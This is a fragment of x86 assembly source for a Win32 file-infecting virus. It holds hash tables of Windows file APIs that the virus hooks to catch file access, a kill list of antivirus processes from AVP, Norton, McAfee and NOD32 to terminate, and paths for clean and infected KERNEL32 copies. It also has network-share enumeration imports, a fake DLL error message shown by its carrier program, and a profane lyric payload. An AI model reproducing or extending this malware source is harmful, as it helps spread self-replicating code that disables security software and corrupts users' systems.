MOV_Reg32: DB 0B8h, 0BBh, 0B9h, 0BAh, 0BEh, 0BFh, 0BDh
XOR_Ptr_Reg32 DB 0B0h, 0B3h, 0B1h, 0B2h, 0B6h, 0B7h, 0B5h
PUSH_Reg32: DB 050h, 053h, 051h, 052h, 056h, 057h, 055h
; ESP CS DS ES SS FLAGS
PUSH_Reg16_32 DB 054h, 00Eh, 01Eh, 006h, 016h, 09Ch
; API which we hook in order to intercept file-access.
Hook_API_CRC: CRC16 <CopyFileA>
CRC16 <CreateFileA>
CRC16 <CreateProcessA>
CRC16 <DeleteFileA>
CRC16 <GetFileAttributesA>
CRC16 <MoveFileA>
CRC16 <MoveFileExA>
CRC16 <SetFileAttributesA>
CRC16 <CopyFileW>
CRC16 <CreateFileW>
CRC16 <CreateProcessW>
CRC16 <DeleteFileW>
CRC16 <GetFileAttributesW>
CRC16 <MoveFileW>
CRC16 <MoveFileExW>
CRC16 <SetFileAttributesW>
; API which we need in order to function.
Work_API_CRC: CRC16 <CloseHandle>
CRC16 <CreateFileMappingA>
CRC16 <FindClose>
CRC16 <FindFirstFileA>
CRC16 <FindNextFileA>
CRC16 <GetCurrentDirectoryA>
CRC16 <GetDriveTypeA>
CRC16 <GetFileSize>
CRC16 <GetFileTime>
CRC16 <GetLastError>
CRC16 <GetLocalTime>
CRC16 <GetLogicalDriveStringsA>
CRC16 <GetProcAddress>
CRC16 <GetSystemDirectoryA>
CRC16 <GetTickCount>
CRC16 <GetWindowsDirectoryA>
CRC16 <GlobalAlloc>
CRC16 <GlobalFree>
CRC16 <LoadLibraryA>
CRC16 <MapViewOfFile>
CRC16 <SetCurrentDirectoryA>
CRC16 <SetFileTime>
CRC16 <UnmapViewOfFile>
CRC16 <WriteFile>
CRC16 <WritePrivateProfileStringA>
End_Work_API_CRC:
Dispatch_API: ; ANSI.
DW (Hook_CopyFileA-START)
DW (Hook_CreateFileA-START)
DW (Hook_CreateProcessA-START)
DW (Hook_DeleteFileA-START)
DW (Hook_GetFileAttributesA-START)
DW (Hook_MoveFileA-START)
DW (Hook_MoveFileExA-START)
DW (Hook_SetFileAttributesA-START)
; Unicode.
DW (Hook_CopyFileW-START)
DW (Hook_CreateFileW-START)
DW (Hook_CreateProcessW-START)
DW (Hook_DeleteFileW-START)
DW (Hook_GetFileAttributesW-START)
DW (Hook_MoveFileW-START)
DW (Hook_MoveFileExW-START)
DW (Hook_SetFileAttributesW-START)
; McAfee, AVP, NAV, and NOD-Ice.
Kill_Table: CRC16 <_AVP32.EXE>
CRC16 <_AVPCC.EXE>
CRC16 <_AVPM.EXE>
CRC16 <ALERTSVC.EXE>
CRC16 <AMON.EXE>
CRC16 <AVP32.EXE>
CRC16 <AVPCC.EXE>
CRC16 <AVPM.EXE>
CRC16 <N32SCANW.EXE>
CRC16 <NAVAPSVC.EXE>
CRC16 <NAVAPW32.EXE>
CRC16 <NAVLU32.EXE>
CRC16 <NAVRUNR.EXE>
CRC16 <NAVW32.EXE>
CRC16 <NAVWNT.EXE>
CRC16 <NOD32.EXE>
CRC16 <NPSSVC.EXE>
CRC16 <NRESQ32.EXE>
CRC16 <NSCHED32.EXE>
CRC16 <NSCHEDNT.EXE>
CRC16 <NSPLUGIN.EXE>
CRC16 <SCAN.EXE>
CRC16 <SMSS.EXE>
End_Kill_Table:
DB 'YOU CALL IT RELIGION, YOU''RE FULL OF SHIT', 0Dh
DB 'YOU NEVER KNEW, YOU NEVER DID, YOU NEVER WILL', 0Dh
DB 'YOU''RE SO FULL OF SHIT, I DON''T WANT TO HEAR IT', 0Dh
DB 'ALL YOU DO IS TALK ABOUT YOURSELF', 0Dh
DB 'I DON''T WANNA HEAR IT, COZ I KNOW NONE OF IT''S TRUE', 0Dh
DB 'I''M SICK AND TIRED OF ALL YOUR GODDAMN LIES', 0Dh
DB 'LIES IN THE NAME OF GOD', 0Dh
DB 'WHEN ARE YOU GOING TO REALIZE THAT I DON''T WANT TO HEAR IT?!', 0Dh
DB 'I KNOW YOU''RE SO FULL OF SHIT, SO SHUT YOUR FUCKING MOUTH', 0Dh
DB 'YOU KEEP ON TALKING, TALKING EVERYDAY', 0Dh
DB 'FIRST YOU''RE TELLING STORIES, THEN YOU''RE TELLING LIES', 0Dh
DB 'WHEN THE FUCK ARE YOU GOING TO REALIZE THAT I DON''T WANT TO HEAR IT!!', 0Dh
DB 'AH, SHUT THE FUCK UP...', 0Dh, 0
Virus_End:
Kill_List_Drives DB 256 DUP(0)
Net_Resource:
Clean_K32_Path DB 260 DUP(0)
Infected_K32_Path DB 260 DUP(0)
ANSI_Target_File DB 260 DUP(0)
Time_Creation DD 0
WNetOpenEnumA DD 0
Time_Last_Access DD 0
WNetEnumResourceA DD 0
Time_Last_Write DD 0
DD 0
Local_Time DW 8 DUP(0)
End_Heap:
Stupid_Dummy DB 0
POLY_START:
PUSH EAX ; This is where the host's
; VA address is placed.
PUSHFD ; Save all registers & flags.
PUSHAD
CALL @16 ; Check for presence of my
DB 'C:\VIRUS.TIR', 0 ; innoculation-file, as I
@16: CALL GetFileAttributesA ; run Soft-Ice myself.
INC EAX ; Nah it ain't T, so let's
JZ START ; go for it.
INT 01h ; Ack, we can't hurt daddy.
NOP
JMP $
Carrier:
PUSH 10h
CALL @17
DB 'Error!', 0
@17: CALL @18
DB 'Failed to initialize GRAPH32.DLL', 0
@18: PUSH 0
CALL MessageBoxA
PUSH 0 ; Back to the beast...
CALL ExitProcess
; The good old MZ-header...
MZ_Header STRUC
MZ_Mark DW 0
MZ_Image_Mod_512 DW 0
MZ_Image_512_Pages DW 0
MZ_Reloc_Items DW 0
MZ_Header_Size_Mem DW 0
MZ_Min_Size_Mem DW 0
MZ_Max_Size_Mem DW 0
MZ_Program_SS DW 0
MZ_Program_SP DW 0
MZ_Checksum DW 0
MZ_Program_IP DW 0
MZ_Program_CS DW 0
MZ_Reloc_Table DW 0
MZ_Header ENDS
PE_Header STRUC
PE_Mark DD 0 ; PE-marker (PE/0/0).
CPU_Type DW 0 ; Minimal CPU required.
Object_Count DW 0 ; Number of sections in PE.
PE_Date_Time DD 0 ; Date/time PE was build.
Reserved_1 DD 0
DD 0
NT_Header_Size DW 0
PE_Flags DW 0
DD 4 DUP(0)
EIP_RVA DD 0
DD 2 DUP(0)
Image_Base DD 0
Object_Align DD 0
File_Align DD 0
DW 0, 0
DW 0, 0
DW 0, 0
PE_Reserved_5 DD 0
Image_Size DD 0
Headers_Size DD 0
PE_Checksum DD 0
DW 0
DLL_Flags DW 0
PE_Header ENDS
Section_Header STRUC
Section_Name DB 8 DUP(0) ; Zero-padded section-name.
Section_Virtual_Size DD 0 ; Memory-size of section.
Section_RVA DD 0 ; Start section in memory.
Section_Physical_Size DD 0 ; Section-size in file.
Section_Physical_Offset DD 0 ; Section file-offset.
Section_Reserved_1 DD 0 ; Not used for executables.
Section_Reserved_2 DD 0 ; Not used for executables.
Section_Reserved_3 DD 0 ; Not used for executables.
Section_Flags DD 0 ; Flags of the section.
Section_Header ENDS
Find_First_Next_Win32 STRUC
File_Attributes DD 0
Creation_Time DD 0, 0
Last_Accessed_Time DD 0, 0
Last_Written_Time DD 0, 0
Find_File_Size_High DD 0
Find_File_Size_Low DD 0
Find_Reserved_1 DD 0
Find_Reserved_2 DD 0
FFN_File_Name DB 260 DUP(0)
Find_DOS_File_Name DB 14 DUP(0)
Find_First_Next_Win32 ENDS
Date_Time STRUC
Current_Year DW 0
Current_Month DW 0
Current_Day_Of_Week DW 0
Current_Day DW 0
Current_Hour DW 0
Current_Minute DW 0
Current_Second DW 0
Current_Millisecond DW 0
Date_Time ENDS
END POLY_START